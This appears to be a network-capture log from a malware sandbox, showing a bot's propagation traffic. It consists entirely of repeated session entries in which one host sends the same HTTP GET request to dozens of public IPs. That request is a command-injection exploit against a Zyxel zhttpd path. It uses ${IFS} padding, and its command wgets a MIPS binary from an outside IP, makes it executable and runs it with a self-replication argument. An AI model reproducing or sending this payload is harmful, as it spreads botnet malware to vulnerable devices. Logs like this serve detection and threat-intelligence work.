                                                  Jan 19, 2024 18:23:57.084201097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4765192.168.2.135085054.81.182.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084254026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4766192.168.2.1349254219.147.61.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084278107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4767192.168.2.13524844.221.79.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084316015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4768192.168.2.135473457.1.148.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084358931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4769192.168.2.1354904198.230.24.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084399939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4770192.168.2.1345160201.47.181.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084435940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4771192.168.2.1344792144.236.211.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084460974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4772192.168.2.1357964118.47.36.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084507942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4773192.168.2.1343654208.125.77.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084534883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4774192.168.2.1333860133.171.158.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084564924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4775192.168.2.1347254117.121.23.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084594011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4776192.168.2.1348462116.202.77.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084625006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4777192.168.2.13508942.65.191.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084666014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4778192.168.2.134787625.253.122.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084718943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4779192.168.2.1337160112.214.185.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084774971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4780192.168.2.1356528124.145.156.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084814072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4781192.168.2.134406091.106.202.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084852934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4782192.168.2.1352582142.58.46.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084897995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4783192.168.2.1358758106.22.13.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084919930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4784192.168.2.135332636.189.1.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.084979057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4785192.168.2.1347298170.161.240.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085031033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4786192.168.2.1352888147.138.184.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085047960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4787192.168.2.134896832.195.235.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085084915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4788192.168.2.1360786197.44.171.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085119009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4789192.168.2.135727270.63.128.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085155010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4790192.168.2.1338740216.118.234.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085208893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4791192.168.2.1335312152.236.179.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085233927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4792192.168.2.134415262.255.55.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085275888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4793192.168.2.1347946208.19.174.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085316896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4794192.168.2.135821824.208.55.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085369110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4795192.168.2.134690051.186.198.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085395098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4796192.168.2.1360628216.50.51.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085431099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4797192.168.2.1346858142.203.84.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085458040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4798192.168.2.1357250136.75.233.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085558891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4799192.168.2.1348248181.255.218.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085582972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4800192.168.2.1339268182.51.146.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085621119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4801192.168.2.1356478190.84.43.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085654974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4802192.168.2.1350104137.33.23.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085715055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4803192.168.2.1340012175.122.145.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085727930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4804192.168.2.135055885.26.218.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085752964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4805192.168.2.134427220.209.196.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085813046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4806192.168.2.1350156157.188.211.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085876942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4807192.168.2.1339486114.42.1.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085906982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4808192.168.2.133355420.218.250.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085932970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4809192.168.2.1342594210.176.54.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085959911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4810192.168.2.13398524.162.142.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.085983038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4811192.168.2.134864485.213.1.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086041927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4812192.168.2.134096292.118.41.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086066961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4813192.168.2.1337508204.188.136.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086110115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4814192.168.2.133957614.209.218.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086150885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4815192.168.2.135236095.252.10.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086178064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4816192.168.2.1352342106.93.56.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086213112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4817192.168.2.133849232.52.233.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086255074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4818192.168.2.134587495.22.230.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086307049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4819192.168.2.135975041.28.205.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086349010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4820192.168.2.1355934187.112.42.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086390018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4821192.168.2.133344875.58.78.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086430073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4822192.168.2.1357602210.103.173.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086451054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4823192.168.2.1358898176.198.187.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086503983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4824192.168.2.1357588192.39.167.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086534023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4825192.168.2.136074884.5.153.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086565018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4826192.168.2.1356066198.231.217.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086615086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4827192.168.2.133825857.198.59.170443
                                                  TimestampBytes transferredDirectionData
